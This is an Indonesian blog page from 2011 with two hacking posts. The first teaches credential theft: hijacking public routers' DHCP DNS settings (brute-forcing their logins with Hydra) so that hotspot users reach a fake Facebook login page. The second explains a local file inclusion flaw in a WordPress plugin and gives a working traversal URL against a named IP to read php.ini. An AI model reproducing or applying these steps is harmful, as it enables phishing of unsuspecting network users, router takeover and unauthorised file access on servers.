Jumat, 28 Oktober 2011

Hacking Facebook para pengguna jaringan lokal via internet

Saat ini banyak cafe, kantor, mall dan sebagainya yang memanfaatkan speedy sebagai koneksi internet yang kemudian dishare aksesnya baik ke switch atau acces point.
Baiklah tools yang dapat siapkan jika ingin memulai adalah :
1. Simple DNS Server
2. Fake login Facebook
3. Hydra dan dictionarynya
4. Web Server


Untuk koneksi maka anda memerlukan akses yang dimana anda memiliki IP Publik untuk membuat DNS Server di komputer anda, jika anda tidak punya coba cari akses komputer yang mempunyai IP Publik misal di kantor anda bekerja dan sebagainya yang dapat dimanfaatkan untuk pembuatan DNS Server.
Di sini diasumsikan anda memiliki koneksi Speedy, jika anda menggunakan Modem router dan belum dilakukan IP Forwarding untuk port DNS Server dan web server yang ada dikomputer maka lakukan terlebih dahulu.
Setelah dilakukan forwarding maka tinggal anda install DNS Servernya yaitu Simple DNS Server.

Klik DNS Records

Muncul tampilan seperti diatas setelah klik DNS Records. Klik Quick Zone Wizard

Masukkan Zone namenya facebook.com lalu web server IP-nya diset IP Speedy anda, lalu klik OK.

Binggo, kita telah mendaftarkan domain facebook.com ke DNS Server kita untuk diarahkan ke IP Speedy kita yaitu 180.254.92.199. Setelah ini kita pasang web fake login facebook di web server kita, yang letaknya satu komputer dengan DNS Server kita saja biar selain irit IP publik juga sama saja.
Setelah kita melakukan redirect IP ke komputer kita dari router modem lalu memasang DNS Server kemudian melakukan setting dan memasang fake login di facebook di web server, tinggal anda memasukkan IP Speedy yang dimiliki ke input Primary DNS Server yang ada di router modem target.
Mari kita coba salah satu target, seperti biasa, salah satu target empuk adalah para chatter di IRC.

Di atas ada chatter dengan nick hotspot_mania, saat diwhois hasilnya adalah :

Kita mendapatkan IP target yaitu 180.245.171.252, lalu kita pastekan IP-nya ke browser.

Setelah kita masukkan IP tersebut di browser tampil inputan seperti diatas, disini jika password default tidak dapat menembus keamanan router modem maka anda dapat memanfaatkan Hydra untuk membobolnya, cara menggunakannya ada di artikel sebelumnya di blog ini.
Setelah masuk ke router dan router modemnya target adalah TP-LINK maka dapat klik Interface Setup, lalu LAN lalu DHCP dalam posisi enabled.

Diset Primary DNS Servernya dengan IP Speedy kita yang mengarah ke DNS Server kita.

Jika sudah demikian, anda dapat menebak apa yang akan terjadi jika para pengguna hotspot, jaringan dan sebagainya yang memanfaatkan DHCP dari modem router ini. Cayoo
Penulis tidak bertanggung jawab atas semua hal yang diakibatkan oleh artikel ini.
Oleh Kurniawan – yk_family_code@yahoo.com

Membahas celah keamanan LFI pada suatu plugin WordPress


Local file inclusion merupakan suatu celah keamanan web yang di mana attacker dapat mengakses file-file didalam server, pembahasan kita disini adalah pada celah keamanan Plugin WordPress yang bernama WordPress OPS Old Post Spinner versi 2.2 yang dimana informasi bug ini didapatkan dari Autosec Tools, mari kita bedah salah satu file php yang bernama logview.php.
<?php
/*  Copyright 2010 Juergen Schulze, 1manfactory.com
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/
$ops_file=urldecode($_GET["ops_file"]);
header(‘Content-type: text/html; charset=”utf-8″‘,true);
if (@file_exists($ops_file)) {
print “<pre>”;
foreach (file($ops_file) as $line) {
print $line;
}
print “</pre>”;
} else {
print ‘<br>No logfile until now’;
}
Di atas kita temukan ada variabel $ops_file yang menggunakan urldecode hehe, untuk informasi tentang urldecode masuk aja ke http://php.net/manual/en/function.urldecode.php.
Disini penulis contohkan melakukan urldecode pada suatu teks
<?php
echo urldecode(“Kurni%C3w%C3n+g%C3nteng”);
?>
Hasilnya :
KurniÃwÃn gÃnteng
Halah masih main-main aja hehe. Nah bagaimana jika :
<?php
echo urldecode(“%2f”);
?>
Hasilnya adalah
/
Oups…..
Dengan begitu diketahui bahwa urldecode tidak aman untuk tindakan filtering pada suatu variabel, nah akibatnya memungkinkan penulis untuk dapat memanfaatkan variabel ops_file untuk obok-obok server hehe.
PoC yang penulis lakukan untuk melihat setting PHP.INI di server target.
http://180.26.176.178/wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2f..%2f..%2f..%2f..%2fphp%2fphp.ini

Celah LFI ini dapat cukup berbahaya jika server mempunyai celah keamanan lebih jauh lagi didalamnya, oke, sekian dulu, cayooo

0 komentar:

Posting Komentar

 

in4matica Generasi Biru Template by Ipietoon Cute Blog Design